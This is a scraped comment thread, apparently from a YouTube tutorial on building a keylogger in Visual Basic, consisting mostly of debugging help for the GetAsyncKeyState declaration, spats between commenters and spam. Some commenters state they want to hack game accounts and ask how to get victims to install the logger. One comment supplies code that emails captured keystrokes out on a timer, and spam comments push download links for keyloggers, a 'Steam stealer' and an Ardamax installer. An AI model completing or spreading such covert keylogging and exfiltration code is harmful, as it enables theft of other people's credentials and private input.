Can someone please help me make a keylogger we can do teamview or just help me via msn or something else. I have laredy installed Visual Basic so that's no problem.
and how is this exactly suppose to keylog someone? i no watever they type shows up on the notepad but how exactly are we suppose to get someone to download or watever like if we put it on a download link that box will pop up that u made then they have to type in the box for it to work so that relly doesnt do anything....
A call to PInvoke function 'Nomats Keylogger!Nomats_Keylogger.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
@MrBmantheman yes we are i admit that im a newbie and VB is for beggners i think if u get good at VB its easyer for u to learn C++ and u know two diffrent languages
A call to PInvoke function 'KeyTracker!KeyTracker.Form2::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
@ebildude123 lol yes it does sorry i tried it out and it 200% works your just doing it wrong.. go sell your computer if you cant even figure this easy stuff out
Where you made the multi-lined TextBox1, you can just use "Dock = Fill" and not fitting it to the form! Resizing Form1: The TextBox1 must fit again! With "Dock = Fill": Very easy! It WILL always fit!!!
@DrMupparna If the characters exceed the limit it will automatically gain the scroll perhaps. This happens on Vista and Windows 7. Xp Has an automatic one.
@MrBmantheman common... i wanna work as a programmer when i grow up and im really looking foward to it. This is my start! im only 10! And i love programming vb and such! I already made an windows hacker and a keygen for adobe flash! Im preddy proud of my self.
@MrBmantheman Then dont watch his vid then you artard...You obviosly searched for something to do with vb, and now your just showing of. People like you need to get off youtube
@xXTMGxCr4zYXx Thats great, i can see that you're evolving past the point of calling me a "poopy head" and into the next tier of calling me an "artard" now as you can clearly see the point i am trying to make is that next time you come at me you wannabe troll, you better have your guns locked and loaded as this was clearly not the case. Now i'll give you some time to think up a suitable clever little remark to get back to me on, better make it good. - regards.
@MrBmantheman Hey dude sorry, hahaha. I think my friend has been on my account again and is talking some shit. Sorry for any inconvenience he may have caused.
@DRMMRI14 because i wanted to start somewhere easy, also it's not like i'm an omnipotent being and i automatically understand how to make a keylogger in VB i'm just pointing out all the people who are confused and it bothers me because it's so easy to fix -.-
@MrBmantheman - you must be the first person to have spotted that - give yourself a pat on the back; you condescending pr@ck that's why is called BASIC - clues in the title !
A call to PInvoke function 'Keylogger project!Keylogger_project.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
A call to PInvoke function 'WindowsApplication1!WindowsApplication1.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
Visual Studio cannot start debugging because the debug target 'C:\Users\Morten\AppData\Local\Temporary Projects\WindowsApplication1\bin\Debug\WindowsApplication1.exe' is missing. Please build the project and retry, or set the OutputPath and AssemblyName properties appropriately to point at the correct location for the target assembly.
Visual Studio cannot start debugging because the debug target 'C:\Users\Morten\AppData\Local\Temporary Projects\WindowsApplication1\bin\Debug\WindowsApplication1.exe' is missing. Please build the project and retry, or set the OutputPath and AssemblyName properties appropriately to point at the correct location for the target assembly.
Thanks alot, it worked for me. But yours is similar to my old one which also works. You people might want to give it a try, heres the Download link : megaupload(DOT)com/?d=SX6W3H7E
I just made my own KeyLogger ! & For you Strugglers that want to Hack accounts or whatever like Runescape,Private Servers, (ect) You can use mine , link is , megaupload(DOT)com/?d=61LT2TFE
Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("email") MyMailMessage.To.Add("email") MyMailMessage.Subject = ("Keylogger") MyMailMessage.Body = RichTextBox1.Text Dim SMTPServer As New SmtpClient("smtp.yourhost.com") SMTPServer.Port = 587(gmail) SMTPServer.Credentials = New System.Net.NetworkCredential("email", "pw") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage)
I did it with VB 2010 and then i debugged it and it didnt work,it shut down my adobe and then i signed into and account and checked the email,it didnt work,someone help please
A call to function Pinvoke keylogger! Keylogger.Form1:: GetAsyncKeyState the stack has been unbalanced. This is probably because the signature accompanied Pinvoke not match the target signature without guidance. Check the parameters of the Pinvoke aanroepconventie and signature match the target signature without guidance.
also thats 1 reason why i try stay away from vb it is a strong typed\defnined lanauge but integer and int16 int32 etc can casuse problems due to overloads i go with c# since in vb u can also have varibles undefined such as dim name
name = "hello" which works but may cause problems especialy wen calling C and c++ libarys on win api
u need to write in a method to determine upper and lower case
also to thoese having problems if ur runing windows x64
user32.dll is misleading. It's the 64 bit version of user32.dll you're calling. The 64 bit version is located at %windir%\System32\user32.dll.
32-bit version is included for compatibility with 32-bit applications. It's located at %windir%\SysWOW64\user32.dll.inspect them using the dumpbin util
kk i did exactly what you did but for some reason for every single tutorial i followed, the keylogger never shows the key pressed on it like at 2:17 its weird please help
"A call to PInvoke function 'Bp Kl 2011!Bp_Kl_2011.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature"
its not loging anything there are no errors but when i click debug and open up notepad it doesnt log my text that i type into notepad.nothing shows up in the form.
By the way, thanks author for the code , i wa stoo lazy to research user32 or other windows libraries for the right function, it works fast, it is simple and easy to develop. Ty.
I am running Windows XP, and using vb 2010, and when I followed all of the instructions, I got this message:
PInvokeStackImbalance was detected
Message: A call to PInvoke function 'Log!Log.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
lol
lucio1237 3 weeks ago
useless....
fundasuiuventus 3 weeks ago
Nice it works
1Muzzafuzza1 4 weeks ago
This has been flagged as spam show
Hi! Could you guys please check out my channel? I will do a giveaway when I reach 100 subscribers! Thanks!
hackster2011 2 months ago
This has been flagged as spam show
Can someone please help me make a keylogger we can do teamview or just help me via msn or something else. I have laredy installed Visual Basic so that's no problem.
TechNock 2 months ago
Change declare to
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Integer
and it will work , thumb up for others to see
fundasuiuventus 2 months ago 8
@fundasuiuventus thanks
1Muzzafuzza1 4 weeks ago
doesnt work
apollonael 4 months ago
how do you fix GetAsyncKeyState error?
Fooy1000 4 months ago
@Fooy1000 You must type Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
under Public Class Form1
snfbtch12 4 months ago
aint working i have tried nothing is coming up
Monsterenumber1 4 months ago
i want to request how to make anti keylogger ( virtual keyboard) =)
zainul201091 4 months ago
Comment removed
ColeSlawProductions 5 months ago
how can i put a keylogger on a internetlink?
RS4movie 5 months ago
Cursor,cursor,cursor,cursor????????????????? :D
ExcessTutorials 5 months ago
lol why make a keylogger that someone needs to install to use ?
DrMupparna 5 months ago
can u make crypter tut for vb 2008
affan546 5 months ago
This is suck....i mean it's only for you...if you send it to other nothing happen
acoop91 6 months ago
it works :)
passy041 6 months ago
please download this program for a complete understanding of this tut.
h tt p :/ / (dot) sovietuniondir tdownloads (dot) /2115351;253jh1 23j5hherp my derp 21j1x2h3fxkglkx23785623o5.rar :) thank you
iLiekpie123123 6 months ago
doesn't work.... when I type nothing happens
NobleProtocol 6 months ago
This has been flagged as spam show
plz test my pro keylogger creator (goo. gl/Jljvo)
parkersletplay 6 months ago
thank u very much!!! i will post the video about advanced keyloggger which is sending e-mails!
Xboy15Hax 7 months ago
/watch?v=-Oqm2ZOCHZY
STEAM STEALER 100 % CLEAN !!!
FuturTechno 7 months ago
lol i got 8 wrong lol why? can give the hack please i need the link please
FLegion1998 7 months ago
and how is this exactly suppose to keylog someone? i no watever they type shows up on the notepad but how exactly are we suppose to get someone to download or watever like if we put it on a download link that box will pop up that u made then they have to type in the box for it to work so that relly doesnt do anything....
cokecokeman1000 7 months ago
does this work for windows 7!?
ZeoWorks 7 months ago
Comment removed
TurboExpBlog 7 months ago
Help is says:
A call to PInvoke function 'Nomats Keylogger!Nomats_Keylogger.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
What should I do...
TurboExpBlog 7 months ago
@MrBmantheman yes we are i admit that im a newbie and VB is for beggners i think if u get good at VB its easyer for u to learn C++ and u know two diffrent languages
THEGAMINGRULER 8 months ago
A call to PInvoke function 'KeyTracker!KeyTracker.Form2::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
ebildude123 9 months ago
DOESNT WORKKKKKKKKK
ebildude123 9 months ago
@ebildude123 lol yes it does sorry i tried it out and it 200% works your just doing it wrong.. go sell your computer if you cant even figure this easy stuff out
sasuke1212naruto 9 months ago
Comment removed
ebildude123 9 months ago
@sasuke1212naruto He code code wrong u fag. It's not As Long) As Integer, it's As Integer) As Integer.
ebildude123 9 months ago
@ebildude123 no he coded correct he just didnt code how you would sorry
sasuke1212naruto 9 months ago
@sasuke1212naruto ??? His code gives me error. My powerful code fixing skills fixed it. :P
ebildude123 9 months ago
@ebildude123 hmm well i worked for me although i fixed it up and tweaked it up but no errors from the start
sasuke1212naruto 8 months ago
MrAlister10 9 months ago
@MrBmantheman
this is a reaction from you reaction in Best reactions:
VB meight be easy but it is sure the best if you use the C# and C++ of microsoft you're using fake C# and C++ microsoft is using a whole other syntax
its not :
cout<<"Hello World"<< endl;
cin.get();
but :
console.write("Hello world");
1st. Real
2nd. fake!
dimucchu18 9 months ago
Where you made the multi-lined TextBox1, you can just use "Dock = Fill" and not fitting it to the form! Resizing Form1: The TextBox1 must fit again! With "Dock = Fill": Very easy! It WILL always fit!!!
TheVSTutorial 9 months ago
omg it works !
DjDaan2708 9 months ago
please help , i get error with
result = GetAsyncKeyState(i)
when i try to run the green triangle thingo.
iEatDrugz 9 months ago
@iEatDrugz i got the same
rangeman1421 9 months ago
@iEatDrugz OFC, a keylogger is illegal so u need to PUBLISH the keylogger and then will it run :D
DrMupparna 9 months ago
@eugenioo12 its the same thing!
RareFreeCpAccounts 9 months ago
@RareFreeCpAccounts visual basic is code language but visual studio si software
gamecreator10 8 months ago
Yo, nice.. but win7 does NOT support this app. i will try to rewrite the code in vb10, maybe it gets compiled differently...
TheAviationMaster005 10 months ago
@TheAviationMaster005 try it with user 64
OkustansBURGER 9 months ago
I maked a fake runescape mem hack, but how can i put a keylogger in it? Just put the code for timer in my hack?
ichstim 10 months ago
I did as u did and I got 0 errors but it doesn't write any text in the keylogger (Windows 7)
MrPhoneshare 10 months ago
Can you PM me the whole code plz? Because i am probably pasting it in the wrong place because i get errors after pressing the green 'play' button.
DubsteqKid 10 months ago
how do u add the scroll thing ? u dont show that xD
DrMupparna 10 months ago
@DrMupparna If the characters exceed the limit it will automatically gain the scroll perhaps. This happens on Vista and Windows 7. Xp Has an automatic one.
EvilMonkeyAvenger 9 months ago
This has been flagged as spam show
NeW vb6 Trojan : watch?v=G4Wn9RKYzhI
EncaisseTonFric 10 months ago
where can i download this adobe visual bacis?
viralistique 10 months ago
COOL!!! ^^
Revevantix 11 months ago
how do u know those codes? can u tell me how to use visual basic?
vernyip 11 months ago
i get an error in result and GetAsyncKeyState. It says those names are not defined
MrPivot127 11 months ago 10
@MrPivot127 you have to put Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
at the top under Public Class Form1
CallOfDutyHacksPS3 8 months ago
@MrPivot127 its not define cos you dim it,didnt use it.
just this to define getasynckeystate
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
imagination774 6 months ago
@MrPivot127 how do you fix it i get the same problem?
Fooy1000 4 months ago
u guys are noobs... visualbasic is a easy as fuck.
MrBmantheman 11 months ago 6
@MrBmantheman you were once a noob too...
Anzac97 10 months ago
@MrBmantheman What do u use ??? :D
DrMupparna 9 months ago
@MrBmantheman Then Why The Fuck Are You Watching This.Dumbass
WickedSpider12 8 months ago 2
@WickedSpider12 :) good question, i simply came here to troll noobs.
MrBmantheman 8 months ago
@MrBmantheman And To Watch How To Make A Keylogger In Visual Basic.
WickedSpider12 8 months ago
@MrBmantheman common... i wanna work as a programmer when i grow up and im really looking foward to it. This is my start! im only 10! And i love programming vb and such! I already made an windows hacker and a keygen for adobe flash! Im preddy proud of my self.
bannanadk 8 months ago
@bannanadk hey so am i! im ten and im CRAZY about computers
VBEducation1 7 months ago
@MrBmantheman so why are you watching this??
CutSceneGamer 8 months ago
@MrBmantheman Then dont watch his vid then you artard...You obviosly searched for something to do with vb, and now your just showing of. People like you need to get off youtube
xXTMGxCr4zYXx 8 months ago
@xXTMGxCr4zYXx Thats great, i can see that you're evolving past the point of calling me a "poopy head" and into the next tier of calling me an "artard" now as you can clearly see the point i am trying to make is that next time you come at me you wannabe troll, you better have your guns locked and loaded as this was clearly not the case. Now i'll give you some time to think up a suitable clever little remark to get back to me on, better make it good. - regards.
MrBmantheman 8 months ago
@MrBmantheman Hey dude sorry, hahaha. I think my friend has been on my account again and is talking some shit. Sorry for any inconvenience he may have caused.
xXTMGxCr4zYXx 8 months ago
@xXTMGxCr4zYXx It's fine
MrBmantheman 8 months ago
@MrBmantheman That's Why Your Fucking Dumbass Is Watching This Video!
WickedSpider12 7 months ago
@MrBmantheman True. But We are all beginners and we have to start with the easy languages to learn. Also, if it's so easy, why are you watching?
DRMMRI14 7 months ago
@DRMMRI14 because i wanted to start somewhere easy, also it's not like i'm an omnipotent being and i automatically understand how to make a keylogger in VB i'm just pointing out all the people who are confused and it bothers me because it's so easy to fix -.-
MrBmantheman 7 months ago
@MrBmantheman Who says that FUCK is EASY?
KazekageBSviiix 7 months ago
@KazekageBSviiix Your mom, she happened to be my tutor.
MrBmantheman 7 months ago
@MrBmantheman oh..... my mam is dead..... YOU MADAFAKING NECROFIL.....
KazekageBSviiix 7 months ago
@KazekageBSviiix I'm sorry that i never apologized for skewering your mom with my gigantic e-peen.
MrBmantheman 7 months ago
@MrBmantheman depends on what you want do.
GhostFire218 7 months ago
Comment removed
FuriousBoy144 7 months ago
@MrBmantheman No its .net that is easy
codfreak35034 7 months ago
@MrBmantheman And your watching this why?
WickedSpider12 6 months ago
@MrBmantheman
you are cerrct
jamiejamiew 6 months ago
@MrBmantheman - you must be the first person to have spotted that - give yourself a pat on the back; you condescending pr@ck that's why is called BASIC - clues in the title !
jonboi999 4 months ago
@jonboi999 lol PR@CK, mommy have tight reins?
MrBmantheman 4 months ago
@MrBmantheman your the noob for not helping those who need help.
snfbtch12 4 months ago 2
@MrBmantheman realy? fuck im screwed
MrAshmed12 4 months ago
@MrBmantheman Is there something wrong with liking to make your programs with ease?
AnnoyingXboxer 3 months ago
@AnnoyingXboxer No, but i wish people would stop replying on a comment that i posted over 7 months ago
MrBmantheman 3 months ago
are you ahacker?
youhanna01timotaos 11 months ago
where can i download that cursor?
dragomanolo 11 months ago
I made it and it is slow - detection Like :
I Typed "Super" It Comes up SP
joeymegastar 11 months ago
@joeymegastar did you change the timer1.interval value to 2? else it would log every 1000 milliseconds, so every second .
jmontineri 11 months ago
THX!! (:
Mrguusguus 11 months ago
Fix the Code or go to hell
MultiProHack 11 months ago
Fix the Code or go to hell xD
MultiProHack 11 months ago
If i do the code, i see the follow errors.
Error 1 Argument not specified for parameter 'e' of 'Private Sub Timer1_Tick(sender As Object, e As System.EventArgs)'.
Error 2 Argument not specified for parameter 'sender' of 'Private Sub Timer1_Tick(sender As Object, e As System.EventArgs)'.
Can you help me?
MrHamty 11 months ago
This has been flagged as spam show
NO NEED TO MAKE IT, check out my user! Download link for the best and easyest keylogger!
TheKasssu 11 months ago
jops das funzt nicht
result = GetAsyncKeyState(i)
ist der error beim debugg naja such ich nen neues video ;)
xX120Xx1 11 months ago
@xX120Xx1 ja bei mir genauso
ollipolli11 7 months ago
yes, in the firts line: NO ->Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
YES -> Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Int16
ericmoyabueno 1 year ago
anyone knows why this doenst works on windows 764bit ?
HackTheAvatar 1 year ago
@HackTheAvatar hahaha 764bit xD
rutger12223 1 year ago
@HackTheAvatar 764 but lololol i have 2274bit ^^
00011theman 1 year ago
Mine in writing sometimes a kind of a Y in the keylogger... Do you have any ideea why ???
Valyusthas220 1 year ago
Could you post a link on where to dowwnload it
plz because mine wont work for some reason
Thanks
ktbsupremo 1 year ago
can you make a video about the codes for the keylogger didnt quite get it , thanks if you do
langyboiz 1 year ago
this doesn't work in vb express 2008. what's wrong with it!! :-(
jaxo110 1 year ago
Comment removed
jaxo110 1 year ago
A call to PInvoke function 'Keylogger project!Keylogger_project.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
leonidhaimov 1 year ago
A call to PInvoke function 'WindowsApplication1!WindowsApplication1.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
dragonkidlvlx 1 year ago
@dragonkidlvlx wow dude, same problem
leonidhaimov 1 year ago
@dragonkidlvlx I found a way to fix it! Just build the project and go to the saved directory. And open it.
leonidhaimov 1 year ago
doesnt work.. y??
dragonkidlvlx 1 year ago
Tnx Brother :D Biiiigggg Likeeeeee and Subscribeeeee!!!!! TNX !
balsa99ravno 1 year ago
---------------------------
Microsoft Visual Basic 2008 Express Edition
---------------------------
Visual Studio cannot start debugging because the debug target 'C:\Users\Morten\AppData\Local\Temporary Projects\WindowsApplication1\bin\Debug\WindowsApplication1.exe' is missing. Please build the project and retry, or set the OutputPath and AssemblyName properties appropriately to point at the correct location for the target assembly.
wtfs should i do?(:
CSSMadzen 1 year ago
---------------------------
Microsoft Visual Basic 2008 Express Edition
---------------------------
Visual Studio cannot start debugging because the debug target 'C:\Users\Morten\AppData\Local\Temporary Projects\WindowsApplication1\bin\Debug\WindowsApplication1.exe' is missing. Please build the project and retry, or set the OutputPath and AssemblyName properties appropriately to point at the correct location for the target assembly.
---------------------------
OK
---------------------------
CSSMadzen 1 year ago
This has been flagged as spam show
sent my this program plz that i can run without visual basic my email gameguycool@gmail.com
gameguycool 1 year ago
This has been flagged as spam show
@skillerplox9runesky
Thanks alot, it worked for me. But yours is similar to my old one which also works. You people might want to give it a try, heres the Download link : megaupload(DOT)com/?d=SX6W3H7E
pati786 1 year ago
This has been flagged as spam show
I just made my own KeyLogger ! & For you Strugglers that want to Hack accounts or whatever like Runescape,Private Servers, (ect) You can use mine , link is , megaupload(DOT)com/?d=61LT2TFE
Skillerplox9runesky 1 year ago
new timer, 18000 int:
Dim MyMailMessage As New MailMessage() MyMailMessage.From = New MailAddress("email") MyMailMessage.To.Add("email") MyMailMessage.Subject = ("Keylogger") MyMailMessage.Body = RichTextBox1.Text Dim SMTPServer As New SmtpClient("smtp.yourhost.com") SMTPServer.Port = 587(gmail) SMTPServer.Credentials = New System.Net.NetworkCredential("email", "pw") SMTPServer.EnableSsl = True SMTPServer.Send(MyMailMessage)
tyler8865 1 year ago
I need help idk what codes to put!!!
FifaDuplicatorMann 1 year ago
which version do you use hypercam?
scherbeijn1 1 year ago
Comment removed
scherbeijn1 1 year ago
This works perfectly so if i sent it to someones computer how would i get their information?
pictomate 1 year ago
OMFG THANK YOUUUUUUUUUUUUUUUUUUUU
THIS ONE WORKED UR THE BESTTTTTTTTTTTTTTTTT
ILoveJustinBieberVM 1 year ago
I did it with VB 2010 and then i debugged it and it didnt work,it shut down my adobe and then i signed into and account and checked the email,it didnt work,someone help please
HackTechHelp 1 year ago
@HackTechHelp this is not an email keylogger if you want that you have to put more code into it
Mycatsaidwhat 1 year ago
This has been flagged as spam show
h t t p://rapidshare.c o m/#!download|472l36|437108022|Ardamax_installer.exe|803
this is the download link remove the spaces
armada link
everybulletcounts 1 year ago
this is fake my computer wouldnt let it debug and im thinking this could be a virus
dudethefun 1 year ago
@dudethefun and im thinking your an idiot and that your computer is gay.
4lyfepk3r 1 year ago
@dudethefun no It's real you are just a nub
Mycatsaidwhat 1 year ago
does this run without being able to see the window?
bobshowers 1 year ago
does not work... would it be different codes for Windows 7?
123dcbam 1 year ago
A call to function Pinvoke keylogger! Keylogger.Form1:: GetAsyncKeyState the stack has been unbalanced. This is probably because the signature accompanied Pinvoke not match the target signature without guidance. Check the parameters of the Pinvoke aanroepconventie and signature match the target signature without guidance.
How i fix this??
ryanz35 1 year ago
also thats 1 reason why i try stay away from vb it is a strong typed\defnined lanauge but integer and int16 int32 etc can casuse problems due to overloads i go with c# since in vb u can also have varibles undefined such as dim name
name = "hello" which works but may cause problems especialy wen calling C and c++ libarys on win api
mkbmainpc 1 year ago
Comment removed
mkbmainpc 1 year ago
u need to write in a method to determine upper and lower case
also to thoese having problems if ur runing windows x64
user32.dll is misleading. It's the 64 bit version of user32.dll you're calling. The 64 bit version is located at %windir%\System32\user32.dll.
32-bit version is included for compatibility with 32-bit applications. It's located at %windir%\SysWOW64\user32.dll.inspect them using the dumpbin util
FILE HEADER VALUES 8664 machine (x64)
FILE HEADER VALUES 14C machine (x86)
mkbmainpc 1 year ago
does this work on windows 7?
Gizzy0011 1 year ago
@Gizzy0011 of course
mixa1996 1 year ago
@Gizzy0011 Yup! i just did it!
TheVJackV 1 year ago
kk i did exactly what you did but for some reason for every single tutorial i followed, the keylogger never shows the key pressed on it like at 2:17 its weird please help
PiccniWeasel1 1 year ago
can you send me the whole visual studio file with the coding please theanks i'll subscribe
PiccniWeasel1 1 year ago
it doesn't work for me :'(
Matthack50 1 year ago
@Matthack50 32bit only i think and u have a 64 bit.!
CrashedOverride12 1 year ago
HELP!
"A call to PInvoke function 'Bp Kl 2011!Bp_Kl_2011.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature"
08arijit 1 year ago
if you get a stack imbalance than change log to integer. i have a keylogger which takes print screens
the0th 1 year ago
@the0th how do you do that
cmbitton 1 year ago
Got this working for Vista 32-bit (was it just me who had problems?). Here is the correct declaration:
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Int32) As Int16
theonlinegamers 1 year ago
@UsefulSoftware mail every 15 mins or so
theonlinegamers 1 year ago
It Rally Works! LOL , Im running WinVista :D
FireViper13 1 year ago
This has been flagged as spam show
Need Visual Basic Tutorials?
Like Programming?
Like Talking With Other People?
Register at my SMF hosted forum at :
programmingtutorials(dot)smfnew(dot)com
NOTE : PROGRAMMING TUTORIALS ARE ONLY VISIBLE TO MEMBERS!
codaassasin 1 year ago
Why isnt mines working?
This is wat i did:
1.Added Textbox, Put multiline and Read Only to True, Changed Back color as "window"
2.Added a timer, Put it enabled and interval as 2
3.Then went to test and didnt work....
ixltankerlxi 1 year ago
its not loging anything there are no errors but when i click debug and open up notepad it doesnt log my text that i type into notepad.nothing shows up in the form.
paganxxxpride 1 year ago
Comment removed
iRULEhaxthewii 1 year ago
Comment removed
iRULEhaxthewii 1 year ago
How to let the type in word turn into Chinese Words or any languages
VengeanceEmo 1 year ago
How to let the type in word turn into Chinese Words or any languages
VengeanceEmo 1 year ago
whats ur screen recorder?
ImLoling12345 1 year ago
@ImLoling12345 Camstasia
Tharosa1942 1 year ago
it not work for me can u send me it?
1337kla 1 year ago
THANKS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
TheDraude95 1 year ago
By the way, thanks author for the code , i wa stoo lazy to research user32 or other windows libraries for the right function, it works fast, it is simple and easy to develop. Ty.
turkhax0r 1 year ago
I am not expert in VB at all but you should know that LONG in API is 32b but long in VB 2005+ is 64b thus you need to declare it in this way:
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Int32) As Int32
turkhax0r 1 year ago
This has been flagged as spam show
View my channel ! I have a lot of VB Videos Tutorials ! Subscribe and rate me !
LittleVB123 1 year ago
wtf i have all do but if u open keylogger dont works!!!
need help
killadima 1 year ago
i m using win 7 . and vb 2010 when i run in vb it works but then seperately is doesnt'
can u say why?
"Enjoy! Don't Be Afraid To Ask For Help Or Request Videos :)" you sy but u dont answer anyone. so just answer me and every cuz it will help them
Mrdevinda 1 year ago
I am running Windows XP, and using vb 2010, and when I followed all of the instructions, I got this message:
PInvokeStackImbalance was detected
Message: A call to PInvoke function 'Log!Log.Form1::GetAsyncKeyState' has unbalanced the stack. This is likely because the managed PInvoke signature does not match the unmanaged target signature. Check that the calling convention and parameters of the PInvoke signature match the target unmanaged signature.
Please help!
ryanvhockey 1 year ago
@ryanvhockey mee too... i'll download the 2008 version its better!
jovantheterrorist 1 year ago
what ddo u click at 0:47?? :(
StrawberryKiller14 1 year ago
@StrawberryKiller14 You just have to select the textbox, then click BackColor in the properties menu.
ryanvhockey 1 year ago
Dont work! ;)
AKzCSS 1 year ago
Hello, i have tried this but it doesn't work with me ? can you help what do I wrong ?
I do excectly what you do. ( sorry for my bad englisch, i am dutch )
joeppoep12 1 year ago
please, help me. if you can, write the instructions in italian please
Assassinominna 1 year ago
with me, the keylogger, register the letter very slow
Assassinominna 1 year ago
@iRecksYoFace Of course not. -.-
KFCHasProducts 1 year ago